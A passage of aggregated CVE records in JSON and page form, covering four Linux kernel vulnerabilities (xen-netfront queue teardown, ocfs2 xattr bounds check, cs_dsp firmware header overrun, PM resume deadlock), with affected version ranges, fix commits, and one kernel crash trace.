"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "198cdc287769c717dafff5887c6125cb7a373bf3",
"status": "affected",
"version": "35cad2003b6447932cfe91f795090586306738e8",
"versionType": "git"
},
{
"lessThan": "b40c912624775a21da32d1105e158db5f6d0554a",
"status": "affected",
"version": "a5d8e6189b134f5db61be5cd59cf5a74bb01edc7",
"versionType": "git"
},
{
"lessThan": "a1753d5c29a6fb9a8966dcf04cb4f3b71e303ae8",
"status": "affected",
"version": "443133330a5d4a3fd429179d460cc297724fefe8",
"versionType": "git"
},
{
"lessThan": "a63eb1e4a2e1a191a90217871e67fba42fd39255",
"status": "affected",
"version": "0abd3f9903fae6ecf8db3c89a459971fe7925499",
"versionType": "git"
},
{
"lessThan": "47e2f166ed9fe17f24561d6315be2228f6a90209",
"status": "affected",
"version": "c5eb468cbc1fa663bf0cc6c5360802dea4e611c2",
"versionType": "git"
},
{
"lessThan": "dcf4ff7a48e7598e6b10126cc02177abb8ae4f3f",
"status": "affected",
"version": "d7dac083414eb5bb99a6d2ed53dc2c1b405224e5",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/xen-netfront.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4.19.233",
"status": "affected",
"version": "4.19.226",
"versionType": "semver"
},
{
"lessThan": "5.4.183",
"status": "affected",
"version": "5.4.174",
"versionType": "semver"
},
{
"lessThan": "5.10.104",
"status": "affected",
"version": "5.10.94",
"versionType": "semver"
},
{
"lessThan": "5.15.27",
"status": "affected",
"version": "5.15.17",
"versionType": "semver"
},
{
"lessThan": "5.16.13",
"status": "affected",
"version": "5.16.3",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.233",
"versionStartIncluding": "4.19.226",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.183",
"versionStartIncluding": "5.4.174",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.104",
"versionStartIncluding": "5.10.94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.15.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.16.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen/netfront: destroy queues before real_num_tx_queues is zeroed\n\nxennet_destroy_queues() relies on info-\u003enetdev-\u003ereal_num_tx_queues to\ndelete queues. Since d7dac083414eb5bb99a6d2ed53dc2c1b405224e5\n(\"net-sysfs: update the queue counts in the unregistration path\"),\nunregister_netdev() indirectly sets real_num_tx_queues to 0. Those two\nfacts together means, that xennet_destroy_queues() called from\nxennet_remove() cannot do its job, because it\u0027s called after\nunregister_netdev(). This results in kfree-ing queues that are still\nlinked in napi, which ultimately crashes:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] PREEMPT SMP PTI\n CPU: 1 PID: 52 Comm: xenwatch Tainted: G W 5.16.10-1.32.fc32.qubes.x86_64+ #226\n RIP: 0010:free_netdev+0xa3/0x1a0\n Code: ff 48 89 df e8 2e e9 00 00 48 8b 43 50 48 8b 08 48 8d b8 a0 fe ff ff 48 8d a9 a0 fe ff ff 49 39 c4 75 26 eb 47 e8 ed c1 66 ff \u003c48\u003e 8b 85 60 01 00 00 48 8d 95 60 01 00 00 48 89 ef 48 2d 60 01 00\n RSP: 0000:ffffc90000bcfd00 EFLAGS: 00010286\n RAX: 0000000000000000 RBX: ffff88800edad000 RCX: 0000000000000000\n RDX: 0000000000000001 RSI: ffffc90000bcfc30 RDI: 00000000ffffffff\n RBP: fffffffffffffea0 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000001 R12: ffff88800edad050\n R13: ffff8880065f8f88 R14: 0000000000000000 R15: ffff8880066c6680\n FS: 0000000000000000(0000) GS:ffff8880f3300000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000000e998c006 CR4: 00000000003706e0\n Call Trace:\n \u003cTASK\u003e\n xennet_remove+0x13d/0x300 [xen_netfront]\n xenbus_dev_remove+0x6d/0xf0\n __device_release_driver+0x17a/0x240\n device_release_driver+0x24/0x30\n bus_remove_device+0xd8/0x140\n device_del+0x18b/0x410\n ? _raw_spin_unlock+0x16/0x30\n ? klist_iter_exit+0x14/0x20\n ? xenbus_dev_request_and_reply+0x80/0x80\n device_unregister+0x13/0x60\n xenbus_dev_changed+0x18e/0x1f0\n xenwatch_thread+0xc0/0x1a0\n ? do_wait_intr_irq+0xa0/0xa0\n kthread+0x16b/0x190\n ? set_kthread_struct+0x40/0x40\n ret_from_fork+0x22/0x30\n \u003c/TASK\u003e\n\nFix this by calling xennet_destroy_queues() from xennet_uninit(),\nwhen real_num_tx_queues is still available. This ensures that queues are\ndestroyed when real_num_tx_queues is set to 0, regardless of how\nunregister_netdev() was called.\n\nOriginally reported at\nhttps://github.com/QubesOS/qubes-issues/issues/7257"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:00.352Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/198cdc287769c717dafff5887c6125cb7a373bf3"
},
{
"url": "https://git.kernel.org/stable/c/b40c912624775a21da32d1105e158db5f6d0554a"
},
{
"url": "https://git.kernel.org/stable/c/a1753d5c29a6fb9a8966dcf04cb4f3b71e303ae8"
},
{
"url": "https://git.kernel.org/stable/c/a63eb1e4a2e1a191a90217871e67fba42fd39255"
},
{
"url": "https://git.kernel.org/stable/c/47e2f166ed9fe17f24561d6315be2228f6a90209"
},
{
"url": "https://git.kernel.org/stable/c/dcf4ff7a48e7598e6b10126cc02177abb8ae4f3f"
}
],
"title": "xen/netfront: destroy queues before real_num_tx_queues is zeroed",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48914",
"datePublished": "2024-08-22T01:32:07.803Z",
"dateReserved": "2024-08-21T06:06:23.294Z",
"dateUpdated": "2025-05-04T08:26:00.352Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41016 (GCVE-0-2024-41016)
Vulnerability from cvelistv5
Published
2024-07-29 06:37
Modified
2025-05-04 09:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ocfs2: strict bound check before memcmp in ocfs2_xattr_find_entry()
xattr in ocfs2 maybe 'non-indexed', which saved with additional space
requested. It's better to check if the memory is out of bound before
memcmp, although this possibility mainly comes from crafted poisonous
images.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:55.953Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af77c4fc1871847b528d58b7fdafb4aa1f6a9262"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41016",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:24:43.120825Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:05.725Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ocfs2/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e2b3d7a9d019d4d1a0da6c3ea64a1ff79c99c090",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e8f9c4af7af7e9e4cd09c0251c7936593147419f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "57a3d89831fcaa2cdbe024b47c7c36d5a56c3637",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c031d286eceb82f72f8623b7f4abd2aa491bfb5e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cfb926051fab19b10d1e65976211f364aa820180",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c726dea9d0c806d64c26fcef483b1fb9474d8c5e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e4ffea01adf3323c821b6f37e9577d2d400adbaa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "af77c4fc1871847b528d58b7fdafb4aa1f6a9262",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ocfs2/xattr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.323",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.285",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.227",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.168",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.112",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.53",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.323",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.285",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.227",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.168",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.112",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.53",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: strict bound check before memcmp in ocfs2_xattr_find_entry()\n\nxattr in ocfs2 maybe \u0027non-indexed\u0027, which saved with additional space\nrequested. It\u0027s better to check if the memory is out of bound before\nmemcmp, although this possibility mainly comes from crafted poisonous\nimages."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:20:10.115Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e2b3d7a9d019d4d1a0da6c3ea64a1ff79c99c090"
},
{
"url": "https://git.kernel.org/stable/c/e8f9c4af7af7e9e4cd09c0251c7936593147419f"
},
{
"url": "https://git.kernel.org/stable/c/57a3d89831fcaa2cdbe024b47c7c36d5a56c3637"
},
{
"url": "https://git.kernel.org/stable/c/c031d286eceb82f72f8623b7f4abd2aa491bfb5e"
},
{
"url": "https://git.kernel.org/stable/c/cfb926051fab19b10d1e65976211f364aa820180"
},
{
"url": "https://git.kernel.org/stable/c/c726dea9d0c806d64c26fcef483b1fb9474d8c5e"
},
{
"url": "https://git.kernel.org/stable/c/e4ffea01adf3323c821b6f37e9577d2d400adbaa"
},
{
"url": "https://git.kernel.org/stable/c/af77c4fc1871847b528d58b7fdafb4aa1f6a9262"
}
],
"title": "ocfs2: strict bound check before memcmp in ocfs2_xattr_find_entry()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41016",
"datePublished": "2024-07-29T06:37:02.530Z",
"dateReserved": "2024-07-12T12:17:45.612Z",
"dateUpdated": "2025-05-04T09:20:10.115Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41038 (GCVE-0-2024-41038)
Vulnerability from cvelistv5
Published
2024-07-29 14:31
Modified
2025-05-04 09:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
firmware: cs_dsp: Prevent buffer overrun when processing V2 alg headers
Check that all fields of a V2 algorithm header fit into the available
firmware data buffer.
The wmfw V2 format introduced variable-length strings in the algorithm
block header. This means the overall header length is variable, and the
position of most fields varies depending on the length of the string
fields. Each field must be checked to ensure that it does not overflow
the firmware data buffer.
As this ia bugfix patch, the fixes avoid making any significant change to
the existing code. This makes it easier to review and less likely to
introduce new bugs.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.155Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6619aa48a011364e9f29083cc76368e6acfe5b11"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76ea8e13aaefdfda6e5601323d6ea5340359dcfa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/014239b9971d79421a0ba652579e1ca1b7b57b6d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2163aff6bebbb752edf73f79700f5e2095f3559e"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41038",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:23:23.396612Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:03.220Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6619aa48a011364e9f29083cc76368e6acfe5b11",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "76ea8e13aaefdfda6e5601323d6ea5340359dcfa",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "014239b9971d79421a0ba652579e1ca1b7b57b6d",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "2163aff6bebbb752edf73f79700f5e2095f3559e",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: cs_dsp: Prevent buffer overrun when processing V2 alg headers\n\nCheck that all fields of a V2 algorithm header fit into the available\nfirmware data buffer.\n\nThe wmfw V2 format introduced variable-length strings in the algorithm\nblock header. This means the overall header length is variable, and the\nposition of most fields varies depending on the length of the string\nfields. Each field must be checked to ensure that it does not overflow\nthe firmware data buffer.\n\nAs this ia bugfix patch, the fixes avoid making any significant change to\nthe existing code. This makes it easier to review and less likely to\nintroduce new bugs."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:20:40.638Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6619aa48a011364e9f29083cc76368e6acfe5b11"
},
{
"url": "https://git.kernel.org/stable/c/76ea8e13aaefdfda6e5601323d6ea5340359dcfa"
},
{
"url": "https://git.kernel.org/stable/c/014239b9971d79421a0ba652579e1ca1b7b57b6d"
},
{
"url": "https://git.kernel.org/stable/c/2163aff6bebbb752edf73f79700f5e2095f3559e"
}
],
"title": "firmware: cs_dsp: Prevent buffer overrun when processing V2 alg headers",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41038",
"datePublished": "2024-07-29T14:31:52.415Z",
"dateReserved": "2024-07-12T12:17:45.620Z",
"dateUpdated": "2025-05-04T09:20:40.638Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52498 (GCVE-0-2023-52498)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 07:38
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
PM: sleep: Fix possible deadlocks in core system-wide PM code
It is reported that in low-memory situations the system-wide resume core
code deadlocks, because async_schedule_dev() executes its argument
function synchronously if it cannot allocate memory (and not only in
that case) and that function attempts to acquire a mutex that is already
held. Executing the argument function synchronously from within
dpm_async_fn() may also be problematic for ordering reasons (it may
cause a consumer device's resume callback to be invoked before a
requisite supplier device's one, for example).
Address this by changing the code in question to use
async_schedule_dev_nocall() for scheduling the asynchronous
execution of device suspend and resume functions and to directly
run them synchronously if async_schedule_dev_nocall() returns false.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:20.585Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f46eb832389f162ad13cb780d0b8cde93641990d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a1d62c775b07213c73f81ae842424c74dd14b5f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e1c9d32c98309ae764893a481552d3f99d46cb34"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e681e29d1f59a04ef773296e4bebb17b1b79f8fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9bd3dce27b01c51295b60e1433e1dadfb16649f7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7839d0078e0d5e6cc2fa0b0dfbee71de74f1e557"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52498",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:57:20.713823Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:51.225Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/base/power/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f46eb832389f162ad13cb780d0b8cde93641990d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a1d62c775b07213c73f81ae842424c74dd14b5f0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e1c9d32c98309ae764893a481552d3f99d46cb34",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e681e29d1f59a04ef773296e4bebb17b1b79f8fe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9bd3dce27b01c51295b60e1433e1dadfb16649f7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7839d0078e0d5e6cc2fa0b0dfbee71de74f1e557",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/base/power/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPM: sleep: Fix possible deadlocks in core system-wide PM code\n\nIt is reported that in low-memory situations the system-wide resume core\ncode deadlocks, because async_schedule_dev() executes its argument\nfunction synchronously if it cannot allocate memory (and not only in\nthat case) and that function attempts to acquire a mutex that is already\nheld. Executing the argument function synchronously from within\ndpm_async_fn() may also be problematic for ordering reasons (it may\ncause a consumer device\u0027s resume callback to be invoked before a\nrequisite supplier device\u0027s one, for example).\n\nAddress this by changing the code in question to use\nasync_schedule_dev_nocall() for scheduling the asynchronous\nexecution of device suspend and resume functions and to directly\nrun them synchronously if async_schedule_dev_nocall() returns false."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:38:01.601Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f46eb832389f162ad13cb780d0b8cde93641990d"
},
{
"url": "https://git.kernel.org/stable/c/a1d62c775b07213c73f81ae842424c74dd14b5f0"
},
{
"url": "https://git.kernel.org/stable/c/e1c9d32c98309ae764893a481552d3f99d46cb34"
},
{
"url": "https://git.kernel.org/stable/c/e681e29d1f59a04ef773296e4bebb17b1b79f8fe"
},
{
"url": "https://git.kernel.org/stable/c/9bd3dce27b01c51295b60e1433e1dadfb16649f7"
},
{
"url": "https://git.kernel.org/stable/c/7839d0078e0d5e6cc2fa0b0dfbee71de74f1e557"
}
],
"title": "PM: sleep: Fix possible deadlocks in core system-wide PM code",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52498",
